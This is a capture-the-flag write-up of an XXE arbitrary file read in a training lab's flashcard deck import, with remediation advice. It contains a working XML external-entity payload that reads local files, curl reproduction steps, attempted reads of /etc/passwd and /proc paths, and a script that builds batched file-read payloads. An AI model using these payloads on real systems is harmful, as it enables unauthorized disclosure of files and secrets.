BugForge — 2026.05.08

Tanuki: Arbitrary File Read via XXE on XML Deck Import (2026-05-08 rotation)

BugForge XML External Entity (XXE) easy

Part 1 — Pentest Report

Executive Summary

Tanuki is a spaced repetition flashcard study app served from BugForge: React SPA + Express JSON API, Anki-derived SRS terminology, Japanese cultural framing. Users register, study seeded decks, and can import custom decks via file upload. The frontend file picker on the import page declares accept=".json,.xml", which surfaces an XML parser path the user-facing flow does not exercise. The XML parser resolves DOCTYPE-declared external entities and persists their expansion into the deck/card record, which is then echoed back via GET /api/decks/:id and GET /api/study/:deckId/cards.

Testing confirmed 1 finding:

ID	Title	Severity	CVSS	CWE	Endpoint
F1	XXE via XML Deck Import (External Entity Expansion)	High	7.5	CWE-611, CWE-827	POST /api/decks/import

The flag was retrieved by registering an account, mirroring a JSON deck shape into an XML body to confirm the parser path was live, then submitting an XML deck containing <!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]> with &xxe; placed in the description and a card front. Reading the deck back via GET /api/study/:deckId/cards returned the entity-expanded card front, with the flag in plaintext.

This is a lab-name rotation of the prior tanuki XXE engagement (2026-03-17): same lab name, same vulnerability class, different lab build. The container hint-string pattern documented in that engagement applied directly here.

Objective

Capture the lab flag (BugForge bug{...} format) from the Tanuki spaced repetition flashcard app.

Scope / Initial Access

# Target Application
URL: https://lab-1778111135105-ut5hno.labs-app.bugforge.io

# Auth details
Registration: POST /api/register {username, email, password, full_name}
Token format: JWT HS256, payload {id, username, iat} (no role claim)
Starting privileges: anonymous (registration is open and unauthenticated)

Registration is fully open. The JWT it returns carries no role claim, so role is read server side from the user record on each authenticated request. GET /api/verify-token returns the full user record including role. The same JWT authorizes the deck import endpoint where the bug lives.
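The claim set can be checked offline by decoding the token's middle segment. The following is a minimal sketch, assuming Node.js; the sample token is built locally with a placeholder signature and a made-up iat value purely for illustration, and is not the lab's token.

```javascript
// Decode the payload segment of a JWT without verifying the signature.
// This only inspects claims; it proves nothing about token validity.
function decodeJwtPayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('expected header.payload.signature');
  return JSON.parse(Buffer.from(parts[1], 'base64url').toString('utf8'));
}

// Hypothetical sample token mirroring the payload shape {id, username, iat}.
const b64 = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
const sampleToken = [
  b64({ alg: 'HS256', typ: 'JWT' }),
  b64({ id: 4, username: 'haxor', iat: 1778111135 }),
  'placeholder-signature',
].join('.');

const claims = decodeJwtPayload(sampleToken);
console.log(Object.keys(claims)); // [ 'id', 'username', 'iat' ]
console.log('role' in claims);    // false
```

A missing role claim in the payload is what pushes the role lookup to the server on every request.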

Reconnaissance — Reading the Bundle for the Parser Inventory

Reconnaissance focused on the React bundle (/static/js/main.2a8c2eb1.js) and the response shapes from registration and the deck endpoints. The bundle was readable enough to surface input element attributes, route paths, and the admin gate logic; no source maps were exposed.

The import page’s file picker declares accept=".json,.xml". Two formats means two parsers wired server side. The user-facing flow (the docs and seeded UX) is JSON deck import; XML is the format that does not appear in the UX but is still wired in. That mismatch is the recon premise that promotes XXE to the top of the hypothesis board.
The frontend renders the /admin link only when user.role === "admin". This is a frontend-side gate; the server side check is unknown until we hit /api/admin/* directly. Cheap to test in isolation.
The JWT carries {id, username, iat} and no role claim. The client fetches the role from the server via GET /api/verify-token on app load. This is the same architecture as the prior bugforge-cheesy-does-it lab (template reuse), which suggests the same authentication and authorization wiring.
Sequential integer IDs on decks, cards, and users. Our JWT id was 4, which means at least three accounts predated ours (likely admin and two seeded customers). IDOR is on the board but not the cheapest probe.
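The accept= signal from the first recon item can be pulled out of a bundle mechanically. This is a rough sketch, assuming the attribute appears either as HTML (accept="...") or as a compiled JSX prop (accept:"..."); the bundle fragment below is hypothetical and does not reproduce the real bundle text.

```javascript
// Collect the distinct file extensions advertised by accept attributes/props
// in a chunk of HTML or compiled JSX. Matches accept="..." and accept:"...".
function findAcceptedExtensions(source) {
  const pattern = /\baccept\s*[:=]\s*["']([^"']+)["']/g;
  const extensions = new Set();
  for (const match of source.matchAll(pattern)) {
    for (const entry of match[1].split(',')) {
      const trimmed = entry.trim().toLowerCase();
      if (trimmed.startsWith('.')) extensions.add(trimmed);
    }
  }
  return [...extensions].sort();
}

// Hypothetical bundle fragment for illustration only.
const bundleSnippet = 'e.jsx("input",{type:"file",accept:".json,.xml",onChange:t})';
console.log(findAcceptedExtensions(bundleSnippet)); // [ '.json', '.xml' ]
```

Each extension in the result is a candidate parser to probe separately.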

Application Architecture

Component	Detail
Backend	Node.js / Express (`X-Powered-By: Express` on every response)
Frontend	React + Material-UI single page application (build hash `main.2a8c2eb1.js`, ~516KB)
Auth	JWT HS256, payload `{id, username, iat}`, no role claim
CORS	`Access-Control-Allow-Origin: *` on every response
Database	Relational, snake_case schema (`card_count`, `cards_studied`, `user_id`), sequential integer IDs

API Surface

Endpoint	Method	Auth	Notes
/api/register	POST	none	Open registration; field allowlist enforced server side
/api/login	POST	none	Returns `{token, user}`
/api/verify-token	GET	JWT	Returns user including `role`
/api/decks	GET	JWT	Lists three seeded decks (id 1, 2, 3)
/api/decks/:id	GET	JWT	Single deck details
/api/decks/import	POST	JWT	Multipart upload, accepts `.json` and `.xml`
/api/study/:deckId/cards	GET	JWT	Returns cards with `front`, `back`, SM-2 fields
/api/study/progress	POST	JWT	SM-2 review submission
/api/study/sessions	GET	JWT	Lists user’s own sessions
/api/stats	GET	JWT	Aggregate stats
/api/admin/users	*	admin	Server enforced role check (returns 403 for non-admin)
/api/admin/decks	*	admin	Server enforced role check
/api/admin/cards	*	admin	Server enforced role check

Attack Chain Visualization

┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐
│ POST /register   │   │ FE accept=       │   │ Benign XML deck  │   │ XML <!DOCTYPE>   │   │ GET /api/study/  │
│ open register    │──▶│ ".json,.xml"     │──▶│ shape mirror     │──▶│ &xxe; →          │──▶│ N/cards reads    │
│ → our JWT        │   │ XML parser wired │   │ → parser alive   │   │ /app/flag.txt    │   │ flag in front    │
└──────────────────┘   └──────────────────┘   └──────────────────┘   └──────────────────┘   └──────────────────┘

Findings

F1 — XXE via XML Deck Import (External Entity Expansion)

Severity: High
CVSS v3.1: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-827 (Improper Control of Document Type Definition)
Endpoint: POST /api/decks/import
Authentication required: Yes (any registered user; registration is open)

Description

The deck import endpoint accepts XML files and parses them with a parser that resolves DOCTYPE-declared external entities. Entity references placed in deck or card fields (e.g. <description> or a card’s <front>) are expanded into the persisted record at parse time, then echoed back when the deck is read via GET /api/decks/:id or GET /api/study/:deckId/cards. Combined with file:// URIs in the SYSTEM identifier, this lets an attacker read arbitrary local files that the application user has read access to.

PR:N reflects open public registration: any unauthenticated party can register and reach the endpoint in two requests, so the chain effectively starts unauthenticated. C:H reflects the demonstrated arbitrary file read disclosing the lab flag at /app/flag.txt. I:N and A:N reflect that the demonstrated impact is read-only file access without integrity or availability degradation.
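The 7.5 score can be reproduced from the vector. The sketch below implements the CVSS v3.1 base-score arithmetic for Scope: Unchanged vectors only, using the metric weights from the CVSS v3.1 specification; it is a partial calculator for checking this finding, not a full implementation.

```javascript
// CVSS v3.1 base score for Scope: Unchanged vectors only (a partial sketch).
const WEIGHTS = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  PR: { N: 0.85, L: 0.62, H: 0.27 }, // Scope: Unchanged values
  UI: { N: 0.85, R: 0.62 },
  C: { H: 0.56, L: 0.22, N: 0 },
  I: { H: 0.56, L: 0.22, N: 0 },
  A: { H: 0.56, L: 0.22, N: 0 },
};

// Spec-defined round-up to one decimal place, written to avoid float drift.
function roundUp(value) {
  const scaled = Math.round(value * 100000);
  return scaled % 10000 === 0 ? scaled / 100000 : (Math.floor(scaled / 10000) + 1) / 10;
}

function baseScore(vector) {
  // Drop the "CVSS:3.1" prefix and turn "AV:N" style pairs into an object.
  const metrics = Object.fromEntries(
    vector.split('/').slice(1).map((pair) => pair.split(':'))
  );
  if (metrics.S !== 'U') throw new Error('sketch handles S:U only');
  const w = (name) => WEIGHTS[name][metrics[name]];
  const iss = 1 - (1 - w('C')) * (1 - w('I')) * (1 - w('A'));
  const impact = 6.42 * iss;
  const exploitability = 8.22 * w('AV') * w('AC') * w('PR') * w('UI');
  return impact <= 0 ? 0 : roundUp(Math.min(impact + exploitability, 10));
}

console.log(baseScore('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N')); // 7.5
console.log(baseScore('CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N')); // 6.5
```

The second line shows how much the PR choice matters: scoring the same vector with PR:L instead of PR:N gives 6.5, which is why the PR:N rationale is spelled out.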

Impact

Arbitrary local file read on the application container. Any file readable by the application user is exposed, including application-controlled secrets, source files, and configuration left in readable paths. The lab flag was disclosed from /app/flag.txt.

Reproduction

Step 1 — Register and capture the JWT

curl -sX POST https://lab-1778111135105-ut5hno.labs-app.bugforge.io/api/register \
  -H 'Content-Type: application/json' \
  -d '{"username":"haxor","email":"[email protected]","password":"password","full_name":""}'
# → 200 with {token, user}; our id is 4

Capture the token value as $TOKEN for subsequent requests.

Step 2 — Confirm the XML parser path is live

Before sending an entity-bearing payload, mirror the JSON deck shape into XML and submit a benign version. A clean import means the XML parser path is live, so the next request can carry the heavy payload.

<deck>
  <name>XMLProbe</name>
  <description>probe</description>
  <category>Probe</category>
  <cards>
    <card><front>front1</front><back>back1</back></card>
  </cards>
</deck>

curl -sX POST https://lab-…/api/decks/import \
  -H "Authorization: Bearer $TOKEN" \
  -F "[email protected];type=application/xml"
# → {"id":5,"message":"Deck imported successfully","cards_count":1}
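The shape mirror in this step can be generated rather than hand-written. This is a small sketch, assuming the JSON deck shape is {name, description, category, cards: [{front, back}]} (inferred from the XML above, not confirmed against the JSON import docs); the function names are illustrative.

```javascript
// Escape the five XML special characters so field values stay plain data.
function escapeXml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&apos;');
}

// Mirror a JSON-shaped deck into the XML layout used by the probe.
function deckToXml(deck) {
  const cardLines = deck.cards.map(
    (card) =>
      `    <card><front>${escapeXml(card.front)}</front><back>${escapeXml(card.back)}</back></card>`
  );
  return [
    '<deck>',
    `  <name>${escapeXml(deck.name)}</name>`,
    `  <description>${escapeXml(deck.description)}</description>`,
    `  <category>${escapeXml(deck.category)}</category>`,
    '  <cards>',
    ...cardLines,
    '  </cards>',
    '</deck>',
  ].join('\n');
}

const probeDeck = {
  name: 'XMLProbe',
  description: 'probe',
  category: 'Probe',
  cards: [{ front: 'front1', back: 'back1' }],
};
console.log(deckToXml(probeDeck));
```

Because every value is escaped, this helper can only produce benign documents, which is the point of a parser-alive probe.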

Step 3 — Submit an XXE payload targeting the flag

<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]>
<deck>
  <name>x</name>
  <description>flag:&xxe;</description>
  <category>x</category>
  <cards>
    <card><front>flag-front:&xxe;</front><back>x</back></card>
  </cards>
</deck>

curl -sX POST https://lab-…/api/decks/import \
  -H "Authorization: Bearer $TOKEN" \
  -F "[email protected];type=application/xml"
# → {"id":6,"message":"Deck imported successfully","cards_count":1}
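The same upload can be prepared from Node.js. The sketch below only builds the request and does not send it. It assumes Node.js 18 or later (global FormData and Blob), a form field named "file", and an upload filename of "deck.xml"; the field name, filename, and the lab.example host are placeholders rather than values confirmed by the steps above.

```javascript
// Build (but do not send) a multipart import request for an XML deck.
// Assumptions: form field "file" and filename "deck.xml" are hypothetical.
function buildImportRequest(baseUrl, token, xml) {
  const form = new FormData();
  // The Blob type becomes the inner Content-Type of the multipart part.
  form.append('file', new Blob([xml], { type: 'application/xml' }), 'deck.xml');
  return {
    url: new URL('/api/decks/import', baseUrl).toString(),
    options: {
      method: 'POST',
      // No Content-Type header here: fetch sets the multipart boundary itself.
      headers: { Authorization: `Bearer ${token}` },
      body: form,
    },
  };
}

const req = buildImportRequest('https://lab.example', 'TOKEN', '<deck/>');
console.log(req.url); // https://lab.example/api/decks/import
// Sending would be: await fetch(req.url, req.options)
```

Setting the part's type explicitly mirrors the type=application/xml suffix on the curl form field.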

Step 4 — Read the deck back to recover the entity expansion

curl -s -H "Authorization: Bearer $TOKEN" https://lab-…/api/study/6/cards
# → {"front":"flag-front:bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}", ...}

Flag: bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}
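When the response shape is not fully known, the flag can be located by walking the parsed JSON for the bug{...} format. This is an illustrative sketch; the sample response below is hypothetical, and only the format of the "front" value follows Step 4.

```javascript
// Recursively collect strings matching the bug{...} flag format from a
// parsed JSON response of unknown shape.
function findFlags(value, found = new Set()) {
  if (typeof value === 'string') {
    for (const match of value.matchAll(/bug\{[^}]+\}/g)) found.add(match[0]);
  } else if (value && typeof value === 'object') {
    for (const child of Object.values(value)) findFlags(child, found);
  }
  return [...found];
}

// Hypothetical response body for illustration.
const sampleResponse = [{ front: 'flag-front:bug{EXAMPLE}', back: 'x' }];
console.log(findFlags(sampleResponse)); // [ 'bug{EXAMPLE}' ]
```

The Set deduplicates the result when the same entity is expanded into more than one field, as with the description and card front here.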

Container Note

The application container has been built with several common recon paths replaced. /etc/passwd, /proc/self/cmdline, /proc/self/cwd/package.json, and /app/package.json all return the literal string “Flag is in a different file” rather than the expected file content. This is a deliberate hint, not a sandbox: the entity reference still resolves, but what comes back is the lab author’s decoy string. The /app/flag.txt path is left untouched and reads cleanly. Pivoting from system paths to app paths with a batched 5-entity scan in a single DOCTYPE landed the flag on the second exploit request. The pattern was documented during the 2026-03-17 tanuki engagement and applied directly here.
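A batched scan of this kind can be generated from a list of candidate paths. The sketch below is one way to lay it out, intended for authorized lab use: one entity per path, each referenced from its own card so every result maps back to a path. The entity names (e0, e1, ...) and the "scan" deck fields are arbitrary, and the path list is illustrative rather than the exact set used in the engagement.

```javascript
// Build one XML deck whose DOCTYPE declares an external entity per candidate
// path, with each entity referenced from its own card front.
// Paths are assumed to contain no XML special characters.
function buildBatchedXxeDeck(paths) {
  const entities = paths.map((p, i) => `  <!ENTITY e${i} SYSTEM "file://${p}">`);
  const cards = paths.map(
    (p, i) => `    <card><front>${p}=&e${i};</front><back>x</back></card>`
  );
  return [
    '<?xml version="1.0"?>',
    '<!DOCTYPE deck [',
    ...entities,
    ']>',
    '<deck>',
    '  <name>scan</name>',
    '  <description>scan</description>',
    '  <category>scan</category>',
    '  <cards>',
    ...cards,
    '  </cards>',
    '</deck>',
  ].join('\n');
}

// Illustrative candidate list drawn from the paths named in this writeup.
const candidates = [
  '/etc/passwd',
  '/proc/self/cmdline',
  '/proc/self/cwd/package.json',
  '/app/package.json',
  '/app/flag.txt',
];
console.log(buildBatchedXxeDeck(candidates));
```

Depending on the parser, a single unreadable path may cause the whole document to be rejected, in which case candidates would need to be sent in smaller batches.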

Remediation

Fix 1 — Reject DTD declarations and disable entity expansion

// BEFORE (Vulnerable)
const libxml = require('libxmljs');

app.post('/api/decks/import', upload.single('file'), (req, res) => {
  const xmlBody = req.file.buffer.toString();
  const doc = libxml.parseXml(xmlBody, { noent: true });   // noent: true makes libxmljs substitute entities (off by default)
  const deck = parseDeckFromXml(doc);
  saveDeck(deck);
  res.json({ id: deck.id, message: 'Deck imported successfully' });
});

// AFTER (Secure)
const libxml = require('libxmljs');

app.post('/api/decks/import', upload.single('file'), (req, res) => {
  const xmlBody = req.file.buffer.toString();

  // Reject any DTD or entity declarations before parsing
  if (/<!DOCTYPE|<!ENTITY/i.test(xmlBody)) {
    return res.status(400).json({ error: 'DTD declarations are not permitted' });
  }

  const doc = libxml.parseXml(xmlBody, {
    noent: false,    // do not substitute entity references
    nonet: true,     // do not fetch external resources over the network
    noblanks: true,
    recover: false
  });

  // Allowlist deck fields at the deserialization boundary
  const deck = {
    name:        doc.get('//name')?.text(),
    description: doc.get('//description')?.text(),
    category:    doc.get('//category')?.text(),
    cards:       extractCards(doc)
  };
  saveDeck(deck);
  res.json({ id: deck.id, message: 'Deck imported successfully' });
});

The pre-parse check rejects DOCTYPE and ENTITY declarations before the parser sees them. The parser options are the second layer: if a declaration gets past the pattern match (for example through an encoding or formatting variant the regular expression does not anticipate), entity references are still not substituted.

Fix 2 — Drop the XML format from the file picker if not needed

The user-facing flow is JSON deck import. If XML support is not a product requirement, remove .xml from the accept= attribute and reject XML server side too. Reducing the parser inventory removes the attack class entirely, which is strictly safer than hardening a parser for a format that no user actually needs.

Fix 3 — Sandbox the application user’s filesystem

Even with parser hardening, the application container should not have readable secrets sitting in /app. Move secrets to environment variables or an external secret store. Mount the application directory read-only where possible. Treat any arbitrary file read as the floor for impact; a hardened filesystem layout limits how bad that floor is.

Additional recommendations:

Validate uploaded files against an extension and content type allowlist before opening them with a parser. A .xml filename with a JSON body, or a .json filename with an XML body, should be rejected on the basis of the extension/content type mismatch.
If multi-format deck import is a requirement, document the supported parsers in an upload spec and harden each one explicitly. Multi-format file upload is a single feature with multiple attack classes; the hardening checklist should be explicit per format.
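The extension/content type mismatch check from the first recommendation could look roughly like the following. This is a sketch under assumptions: the allowlist contents, the accepted MIME types, and the first-character sniffing heuristic are all illustrative choices, not the application's actual rules.

```javascript
const path = require('node:path');

// Guess the format from the first non-whitespace character of the body.
function sniffFormat(buffer) {
  const text = buffer.toString('utf8').replace(/^\uFEFF/, '').trimStart();
  if (text.startsWith('{') || text.startsWith('[')) return 'json';
  if (text.startsWith('<')) return 'xml';
  return 'unknown';
}

// Hypothetical allowlist: extension -> expected body format and MIME types.
const ALLOWED = {
  '.json': { format: 'json', types: ['application/json'] },
  '.xml': { format: 'xml', types: ['application/xml', 'text/xml'] },
};

// Accept the upload only when extension, declared type, and body all agree.
function isConsistentUpload(filename, declaredType, buffer) {
  const rule = ALLOWED[path.extname(filename).toLowerCase()];
  if (!rule) return false;
  return rule.types.includes(declaredType) && sniffFormat(buffer) === rule.format;
}

console.log(isConsistentUpload('deck.xml', 'application/xml', Buffer.from('<deck/>')));      // true
console.log(isConsistentUpload('deck.xml', 'application/xml', Buffer.from('{"name":"x"}'))); // false
```

A check like this narrows which parser an upload can reach; it does not replace hardening the parser itself.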

OWASP Top 10 Coverage

A03:2021 — Injection: XXE is a server-side injection in which attacker-supplied parser directives (the DOCTYPE and its entity declarations) turn document data into a file read. The deck body is data, but the DOCTYPE is an instruction to the parser.
A05:2021 — Security Misconfiguration: The XML parser runs with permissive entity resolution, and the multi-format file upload exposes a parser that the user-facing flow does not need. The 2021 edition folds the former A4:2017 XML External Entities category into A05, so this is the primary mapping.
A04:2021 — Insecure Design: The import surface ships with no parser hardening or per-format threat model. The frontend accept= attribute advertises an attack surface that did not need to exist.

Tools Used

Tool	Purpose
Caido	Proxy for crafting and replaying multipart uploads with arbitrary inner Content-Type
curl	Reproducible request flow documented in the writeup
Browser DevTools	Bundle reading (`/static/js/main.2a8c2eb1.js`) for the `accept=` attribute and route inspection
Discovered skill `xxe-container-file-enumeration`	Pattern from a prior tanuki engagement: container hint string indicator + batched entity scan across candidate app paths

References

CWE-611: https://cwe.mitre.org/data/definitions/611.html
CWE-827: https://cwe.mitre.org/data/definitions/827.html
OWASP XML External Entity Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
OWASP A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/
Prior tanuki XXE writeup (2026-03-17): tanuki-xxe.md

Part 2 — Notes / Knowledge

Key Learnings

A multi-format file upload runs one parser per format, and every format on that list is its own attack class. XML invites XXE, YAML invites deserialization, archives invite zip slip, JSON invites prototype pollution and mass assignment, CSV invites formula injection. The frontend input’s accept= attribute is the cheapest signal of which formats are wired. Read it during recon, treat each entry as a separate hypothesis, and don’t default to the format the docs or UX show.
Send a parser-alive probe before any heavy parser-target payload. Mirror the documented shape (often the JSON example) into the candidate format and submit a benign version. Clean import means the parser is wired; send the attack payload next request. Format-specific 400 means parser alive but rejecting your shape; iterate. Generic “unsupported file type” means the parser is inactive for this format; move on. Applies to XXE, deserialization, prototype pollution, zip slip, formula injection: anywhere a heavy probe risks burning against a dead branch.
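The three probe outcomes above reduce to a small decision function. This is a heuristic sketch: the status handling and the match on the phrase "unsupported file type" are assumptions about how a target might respond, and the outcome labels are made up for illustration.

```javascript
// Classify a parser-alive probe response into the outcomes described above.
function classifyProbe(status, bodyText) {
  if (status >= 200 && status < 300) return 'alive';          // clean import
  if (/unsupported file type/i.test(bodyText)) return 'dead'; // format not wired
  if (status === 400) return 'alive-rejecting-shape';         // parser ran, shape wrong
  return 'inconclusive';
}

// Hypothetical response bodies for illustration.
console.log(classifyProbe(200, '{"id":5,"message":"Deck imported successfully"}')); // alive
console.log(classifyProbe(400, '{"error":"Invalid XML: missing cards"}'));          // alive-rejecting-shape
console.log(classifyProbe(400, '{"error":"Unsupported file type"}'));               // dead
```

Only the 'alive' outcome justifies spending the heavier payload on the next request.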

Failed Approaches

Approach	Result	Why It Failed
Direct `GET /api/admin/users` with a non-admin JWT (frontend-only admin gate hypothesis)	403 Forbidden, body `{"error":"Admin access required"}`	The role check is enforced server side. Same template wiring as bugforge-cheesy-does-it (identical error string).
Mass assignment of `role:"admin"` on `POST /api/register`	Server returns user object without echoing `role`; `/api/verify-token` confirms `role:"user"` on the resulting JWT	Register handler applies a field allowlist; arbitrary fields in the body are dropped.
First XXE attempt with `file:///etc/passwd` and other common recon paths (`/proc/self/cmdline`, `/proc/self/cwd/package.json`, `/app/package.json`)	All four returned the literal string “Flag is in a different file” rather than the expected file content	Container build replaces popular recon paths with a hint string. The pivot to the flag's direct path (`/app/flag.txt`) was the load-bearing step.
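Separating decoy reads from real ones after a scan is a simple comparison against the hint string. The sketch below assumes scan results have already been collected into a path-to-content map; the map and the placeholder flag value are hypothetical.

```javascript
// The decoy string returned by the replaced recon paths.
const DECOY = 'Flag is in a different file';

// Split scan results (path -> expanded content) into decoys and real reads.
function partitionScan(results) {
  const decoys = [];
  const hits = [];
  for (const [filePath, content] of Object.entries(results)) {
    (content.trim() === DECOY ? decoys : hits).push(filePath);
  }
  return { decoys, hits };
}

// Hypothetical scan results for illustration.
const scanResults = {
  '/etc/passwd': DECOY,
  '/proc/self/cmdline': DECOY,
  '/app/package.json': DECOY,
  '/app/flag.txt': 'bug{EXAMPLE}',
};
console.log(partitionScan(scanResults).hits); // [ '/app/flag.txt' ]
```

A decoy still confirms that entity resolution works, so paths in the decoys list are evidence of the bug even though they carry no useful content.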

Tags: #bugforge #webapp #xxe #file-upload #xml #multipart #parser-alive-probe #container-hint #cwe-611 #cwe-827
Document Version: 1.0
Last Updated: 2026-05-08
